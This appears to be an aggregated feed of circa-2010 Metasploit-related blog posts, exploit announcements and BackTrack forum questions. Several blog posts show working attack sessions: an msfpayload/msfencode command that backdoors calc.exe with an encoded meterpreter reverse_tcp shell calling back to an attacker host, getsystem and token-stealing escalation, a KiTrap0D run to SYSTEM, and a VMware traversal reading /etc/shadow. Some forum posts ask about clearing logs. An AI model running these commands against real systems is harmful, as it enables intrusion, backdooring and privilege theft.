Other neat shiz...
Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.
http://www.sensepost.com/blog/4552.htmlSome quick research into NTP(from ww.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program eg. 'ntpdc target.ntp.server'. Some of these commands include:
- listpeers - List the peers(NTP servers) for the time server
- showpeer - Give time keeping info about a specific peer time server
- peers - List peers and some basic time keeping info
- sysstats - Info regarding ntp daemon itself
$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126,
refid=17.72.133.54, reftime=cf648929.538400d4 Mon, Apr 5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c Mon, Apr 5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0
$ ntpdc -c peers time.euro.apple.com
remote local st poll reach delay offset disp
=======================================================================
*time1.euro.appl 17.72.255.11 1 128 377 0.00069 0.000155 0.07887
=time2.euro.appl 17.72.255.11 1 128 377 0.00061 0.000177 0.08919
=17.254.0.49 17.72.255.11 1 128 377 0.14996 0.000237 0.06696
=TrueTime.asia.a 17.72.255.11 1 128 377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11 2 128 0 0.17369 0.007904 3.99217
+time4.euro.appl 17.72.255.11 2 32 376 0.00015 -0.000151 0.04303
$ ntpdc -c listpeers time.euro.apple.com
client time1.euro.apple.com
client time2.euro.apple.com
client 17.254.0.49
client TrueTime.asia.apple.com
client A17-106-100-13.apple.com
sym_active time4.euro.apple.com
Of course if you just want to do the monlist yourself you can...
$ ntpdc -c monlist time.euro.apple.com
remote address port local address count m ver code avgint lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12 5 3 4 0 0 0
static-86-51-114-108.m 316 17.72.255.12 25 3 4 0 0 0
207-38-154-68.c3-0.ave 40311 17.72.255.12 7 3 4 0 0 0
62-177-171-130.dsl.bbe 501 17.72.255.12 1 3 4 0 0 0
bb6a37ee.virtua.com.br 123 17.72.255.12 1 3 4 0 0 0
p4FC7545E.dip.t-dialin 123 17.72.255.12 1 3 4 0 0 0
--SNIP--
Still Interested?
http://www.ntp.org/documentation.html
-
4:20
»
remote-exploit & backtrack
Ok, upon testing Metasploit and not getting sessions when I should have been, I have concluded it may have something to do with Port forwarding not being enabled.
I know how to forward ports, type 192.168.xx.x into my browser, supply my login details, and then go to port forwarding and configure, however my only unsurity is, officly i have two different Ip's between my primary OS machine and my VM machine when I switch onto backtrack, example my OS ip is 192.168.xx.xx and my BT IP is 10.0.2.xx so when i Type 192.168.xx.x into my primary OS browser and forward ports will the changes apply when I boot my Backtrack also, or is a different process required for that?Hope you can provide some clarity.
-
2:02
»
remote-exploit & backtrack
Hey all ... I've been experimenting with backtrack and metasploit for the past few days now, and I've succesfully managed to penetrate an Windows XP SP0 system using metasploit ... However, when I use the autopwn method in metasploit for scan an ubuntu 7.10 system, no sessions are automatically created, meaning no vulnerabilities were found .. Is this correct ? Are there no exploits in backtrack/metasploit for linux based OSes .. ?
Also, is metasploit's autopwn function a good way of scanning a network for vulnerable systems ?
-
-
14:25
»
remote-exploit & backtrack
Hey guys, I'm trying to figure out how to ssh into a Metasploit reverse tcp handler running on my home machine. I case that's a little confusing, I have a machine on my home network with a Metasploit handler running. I can ssh into the box, but I'd like to be able to control that specific console. I don't know if this is possible or not and lots of searching hasn't gotten me anywhere, so here I am... Any help would be appreciated :)
-
-
17:47
»
remote-exploit & backtrack
Hi
To me, some metasploit auxilliary/modules of oracle such as oracle_login, dbms_export_extension don't work any more.
The warnings are such as "OCI" error (ruby-oci8). Even though I've successfully installed it in new fresh Ubuntu ruby, I can't still run oracle modules
According to my knowledge, BT4 has already had ->
metasploit com/redmine/projects/framework/wiki/OracleUsage
Metasploit Framework - OracleUsage - Metasploit Redmine Interface
Any ideas?
-
-
5:33
»
remote-exploit & backtrack
Hello,
I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.
------
[-] Auxiliary failed: NameError uninitialized constant OCIError [-] Call stack:
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in
`load_missing_constant'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in
`const_missing_with_dependencies'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in
`const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'[*] Auxiliary module execution completed
-----
I have tried the below recommendation for Windows Server 2003 environment but it is giving the same problem. Please assist. Thanks.
[1]Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2]install ruby
ruby186-27_rc2.exe
[3]install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole (I am not able to execute this command successfully)
-
1:32
»
remote-exploit & backtrack
Ciao ! mi chiedevo se è possibile usare metasploit, netcat e altri strumenti, quando si è connesi a internet con una internetkey? cambia qualcosa?
-
-
18:06
»
remote-exploit & backtrack
For the last few weeks i've been playing with metasploit ...
Ive had fun hacking an old server using the old net_api overflow on xp sp 2
I just read the metasploit blog about the new adobe_libtiff exploit
i used the payload
windows/meterpreter/reverse_tcp
(is this right ?)
I have the PDF on the target machine it works A ok and connects back to my machine on xxx.xxx.xxx.3:1133 my question is ....
how do i go from a tcp connection to either a meterpreter session or vncinject using the command line in ruby ?
i've tried:
connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing ?
^^^ do i need to run this as a bg session/job ?
any suggestions please
& please dont flame me
-
-
11:38
»
Carnal0wnage
Very cool update to metasploit today:
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
-
-
0:53
»
remote-exploit & backtrack
hi,
MS10-002 ,ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit )
4xsecurityteam.blogspot(dot)com (home page)
4xunderground.blogspot(dot)com
vimeo(dot)com/user1010000
thk$
-
-
21:00
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective.
-
21:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective.
-
12:10
»
remote-exploit & backtrack
I've been playing around for the last few hours trying to get this working.
I've read many forum posts on different forums, but I still haven't got it working.
It doesn't help that all of the Fast-track websites are down, both "Secure State" and "The Pen Test".
I've done all sorts of weird stuff like create a user called "postgres", and I can't count many ruby libraries I've installed.
Here's some of the guides I've followed:
Automate Your Pen Testing with Fast-Track and Linux - www.enterprisenetworkingplanet.com
The Bored IT Guy » How to install Fast-Track 4.0 on Ubuntu
[ubuntu] How to: metasploit with autopwn [Archive] - Ubuntu Forums
Here's the versions I'm working with:
Metasploit v3.3.4-dev
Fast-track v4.0
When I run Fast-track, it tests for dependencies and everything comes back OK except for
pymills. I searched the web for
pymills and it seems to have disappeared into a black hole, seems like the Russians came and kidnapped the developers.
If I do:
Code:
python fast-track.py -i
Enter 2 for Autopwn.
Enter the IP address.
Enter 2 for Reverse Binding.
Then it loads Metasploit but here's what I get, check out the errors in red:
Code:
msf > db_destroy pentest
dropdb: could not connect to database postgres: FATAL: Ident authentication failed for user "root"
msf > db_create pentest
createdb: could not connect to database postgres: FATAL: Ident authentication failed for user "postgres"
[-] Error while running command db_create: Failed to connect to the database: FATAL: Ident authentication failed for user "postgres"
Call stack:
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1552:in `db_create_postgresql'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `send'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `cmd_db_create'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `run_command'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:201:in `run_single'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `run_single'
/root/metasploit/lib/rex/ui/text/shell.rb:144:in `run'
/root/metasploit/msfconsole:93
msf > db_nmap 192.168.1.111
[-] Unknown command: db_nmap.
msf > db_autopwn -p -t -e -r
[-] Unknown command: db_autopwn.
msf > sleep 5
msf > jobs -K
Stopping all jobs...
Anyone got any ideas?
-
-
10:43
»
remote-exploit & backtrack
Hola señores bueno pues ahora llego yo con un videotuto que se trata de explotar una vulnerabilidad que se encuentra en el puerto 445 de Windows 7 este bug ya lo vi el el foro publicado por Progresive Death no queda de mas aclarar que el lo ejecuta desde el codigo fuente mas yo no yo lo ejecuto desde el metasploit directamente por esa razon lo monte y bueno lo que vamos a hacer es obtener el famoso pantallazo azul en nuestra maquina victima espero les guste el video gracias.
Video
youtube.com/user/sOrtHacK#p/u/2/VwYJ60K16LI
-
-
12:40
»
remote-exploit & backtrack
[*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can i manually select the version of it + language?
my 2nd question is how do i run the GUI of metasploit in windows?
Thanks.
-
-
17:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the CWD verb in Easy~FTP Server. You must have valid credentials to trigger this vulnerability.
-
-
14:23
»
remote-exploit & backtrack
I read ecsployt's quick tutorial on metasploit and it intrigued me..
i got to the end and read a few comments on how good and helpfull it was.
but i have to say i still dont have clue what is going on. can someone suggest some reading for someone like me, (lets say a total vegatable).
Thanks.:confused:
-
-
11:54
»
remote-exploit & backtrack
i know this might sound pretty noobish to some of you professionals, but what is the best way to determine what exploits will work on a victim machine. i know nmap is good for finding ports but what is the method everyone uses to know what exploit to choose that will comply. i am running boxs with win xp sp2 and sp3 and my host with bt4 final.
-
-
11:17
»
remote-exploit & backtrack
hey guys,
so ive been working with metasploit on normal internal networks at home. Everything works great there. Now ive wanted to go to the next level and see how everything works on a domain. So ive set up a small server at home and a domain to log into. I have a client log onto the server. I connect to this client using meterpreter. etc etc. So till now everything was jolly. Now when i try to take over the root account or system of the computer that ive exploited i cant migrate to the system. I think it has something to do with the fact the im logged onto the server and not the local account. Any idea on how to compromise the local account? Or even better the server that the computer is logged into?
I kno its a lot to read through, but i appreciate the help..
squib
-
-
6:33
»
Carnal0wnage
Since everyone else is releasing code to check for/exploit the vmware server/esx/esxi directory traversal vulnerability I pushed up my checker module to the metasploit trunk as an auxiliary scanner module.
If you want to just download a full guest host check out:
GuestStealer --
http://www.fyrmassociates.com/tools/gueststealer-v1.1.plor the
nmap script --
http://www.skullsecurity.org/blog/?p=436I don't feel like re-implementing it and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality write it or use the above tools. Gueststealer works great.
Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html
The module:
The module is simple enough. By default it checks for:
FILE /etc/vmware/hostd/vmInventory.xml
If it receives a 200 to the traversal string and file it says its vulnerable. If you want to see the output of the file you can uncomment the following line from the code:
#print_status("Output Of Requested File:\n#{res.body}")
reload the module, then change the file to what you want (example: set FILE /etc/shadow).
Since VMWare runs as root you pretty much have access to anything on the file system.
-
-
0:11
»
remote-exploit & backtrack
[Videotutorial] Borrado de logs - Clearev
En este Video hago la utilizacion de una herramienta que nos proporciona el metasploit, esta herramienta es automatizada completamente, busca cualquier tipo de archivo guardado con el log de uno deja al accerder al sistema y alguna aplicaciones que ejecutamos sin querer.
Video -----> hxxp://blip.tv/file/3185165
Espero que les guste.
Saludos
-
0:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack-based buffer overflow within HyleosChemView.ocx of Hyleos ChemView 1.9.5.1. By setting an overly long value to 'SaveAsMolFile()', an attacker can overrun a buffer and execute arbitrary code.
-
-
11:17
»
remote-exploit & backtrack
hi,
is it possible to use the autopwn function to check a host if it would be possible to be exploited without exploiting it?
or is there any other way to check a host against all exploits from metasploit without compromising the host?
-
-
17:00
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in Novell iPrint Client 5.30. When passing an overly long string via the target-frame parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The operation variable must be set to a valid command in order to reach this vulnerability.
-
17:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in Novell iPrint Client 5.30. When passing an overly long string via the target-frame parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The operation variable must be set to a valid command in order to reach this vulnerability.
-
-
7:24
»
remote-exploit & backtrack
newbie to metasploita and other similar.
i have downloaded on one machine and transferred to another server for install.
having installed it now says it hase not been update for 42 days. however the server has no internet connectivity. any advice how i can update?
Thanks
-
-
10:24
»
Carnal0wnage
Shiny new hotness...
meterpreter > getuid
Server username: WINXPSP3\user **user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hey I want user back!
meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
steal_token
meterpreter > steal_token -h
[-] Usage: steal_token [pid]
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell Process 1272 created. Channel 2 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>
wait I want a SYSTEM shell again
meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
or call execute without -t to use your process token
meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
-
8:55
»
Carnal0wnage
more for documentation and historical purposes than "new hotness"
original advisory
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
Now implemented in Metasploit
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
**Nipple Rub...**
-
-
15:55
»
remote-exploit & backtrack
So I've played around with metasploit for a while now, pentesting my own network. One problem: Once I have successfully gotten a meterpreter shell, I cannot figure out how to correctly modify/add a registry value with a space in the path.
for example, if I run this:
HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Use rList -v fred -d 0
it tries to do something with:
HKLM\\Software\\Microsoft\\Windows
I have tried to enclose it it quotes, like you would in a windows command shell, and several other things to no avail.
Any help would be much appreciated.
(Unfortunatly, I am running metasploit under windows, so could this cause slight syntax problems?)
-
-
4:41
»
remote-exploit & backtrack
Est-ce que quelcun saurait comment effacer l' histoire de la ligne de commande de la MsfConsole??? Merci beaucoup :)
-
-
13:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the IntelliTamper. By sending an overly long string to the defer script, an attacker may be able to execute arbitrary code.
-
5:52
»
remote-exploit & backtrack
Hi all,
I know that we could setup web server using metsploit, But I cant access it over internet, its accessable inside LAN but not over the net.. Wondering why...
any help would be appreciated.
-
-
17:00
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in the IntelliTamper. By sending an overly long string to the defer script, an attacker may be able to execute arbitrary code.
-
17:00
»
Packet Storm Security Advisories
This Metasploit module exploits a stack overflow in the IntelliTamper. By sending an overly long string to the defer script, an attacker may be able to execute arbitrary code.
-
14:25
»
remote-exploit & backtrack
hi
I Hope this is the right place to ask this.
When I use Metasploit its work very good on my local network
but when i want to pentest out of my local it doesnt work:confused:
can some one tell me why?
-
6:45
»
Carnal0wnage
So I had a requirement to take some output from nmap scans, shove it into a database and then be able to run some queries on that data.
Wait, isn't there something that already does that?!
Actually
PBNJ and
nmap_xml2sql.pl will do this but uses (eeeek!) perl to do it. I wanted to do it in Ruby.
Your options for Ruby & Nmap parsing are:
-rubynmap
http://rubynmap.sourceforge.net/-ruby-nmap
http://ruby-nmap.rubyforge.org/-metasploit has its own nmap xml parser
-writing your own
I started with rubynmap for my parsing gem.
(Note: use the svn version. the version # hasn't changed but the svn version works alot better)
I stole the schema from nmap_xml2sql and added a few things and a scripts table for nmap scripts output and tried shoving that into a sqlite3 database.
TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
version TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER)
TABLE hosts (
sid INTEGER,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4 TEXT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
tcpcount INTEGER,
udpcount INTEGER,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
upstr TEXT)
----SNIP----
This "works" but sqlite3 doesn't seem to actually support foreign keys. So while I was correctly assigning a SID value in nmap that value wasn't linking up in hosts and the HID value in subsequent tables. If I'm wrong here please let me know if this works for you as written. For me in populates with nulls and I don't see how its linking back to the tables.
cg@ihatesql:~$ sqlite3 nmap
SQLite version 3.6.21
sqlite> .dump nmap
CREATE TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
nmapversion TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
INSERT INTO "nmap" VALUES(1,'4.90RC1','1.03','nmap -A -oX test.xml 209.20.85.250','connect',1262181807,'Wed Dec 30 09:03:27 2009',1262181814,'Wed Dec 30 09:03:34 2009',1000);
COMMIT;
sqlite> .dump hosts
CREATE TABLE hosts (
sid INTEGER ,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
starttime INTEGER,
endtime INTEGER,
);
INSERT INTO "hosts" VALUES(NULL,1,'209.20.85.250','209-20-85-250.slicehost.net','up','','','','','',1262181807,1262181814);
COMMIT;
so we can see that the SID and HID are correctly auto incrementing but the SID didn't make it into the hosts table
**Actually sqlite3 as of 3.6.19 supports foreign keys...by adding a
FOREIGN KEY(sid) REFERENCES nmap(sid) to the hosts table and so on. And by declaring PRAGMA foreign_keys = ON.
BUT I still couldn't get it to work.
doing a db.execute("PRAGMA foreign_keys = ON") wasn't working for me. I received no errors but doing a dump on the table would list the foreign key support as OFF :-( maybe its a gem issue?
So to cheat I added ip4num, ip6, hostname to tables i knew I'd be querying a lot like ports and scripts.
CREATE TABLE ports (
hid INTEGER,
ip4num INTEGER,
ip6 TEXT,
port INTEGER,
state TEXT,
reason TEXT,
name TEXT,
tunnel TEXT,
product TEXT,
version TEXT,
extra TEXT,
confidence INTEGER,
method TEXT,
proto TEXT,
owner TEXT,
rpcnum TEXT,
fingerprint TEXT,
FOREIGN KEY(hid) REFERENCES hosts(hid)
)
That way, querying for open ports or specific versions of a service were possible and I could still get an IP associated with that. A bit harder to pull all that information together but still there and a select * from ports; or select ip4num from ports where port = 1521; would return quick results.
So code or it didn't happen...
nmap-parse takes an nmap xml file and spits out some of the results
http://carnal0wnage.attackresearch.com/sites/default/files/nmap-parse.txt
rubynmapsqlite3 takes an nmapfile and database name (optional), creates or connects to the database, populates the tables if it needs to, parses the nmap xml and puts it into its appropriate tables.
http://carnal0wnage.attackresearch.com/sites/default/files/nmapsqlite3.txt
ruby-nmap-parse uses the ruby-nmap gem to parse nmap xml files
http://carnal0wnage.attackresearch.com/sites/default/files/ruby-nmap-parse.txt
caveats:
-my ruby coding sucks.
-my SQL coding sucks worse.
-code is released in "works for me" status
-send diffs not complaints :-) unless you go crazy with it, in which case just send me a link to your code
Next up pushing that data into a postgres database instead of sqlite3.
-
1:00
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in Easy chat server by passing an arbitrary evil buffer along with the username password. Successful attack could run arbitrary code on a victim's machine.
-
-
11:53
»
remote-exploit & backtrack
Buona giornata a tutti,
Qualcuno sa dirmi come cancellare la history della linea di comando della MsfConsole?
Grazie
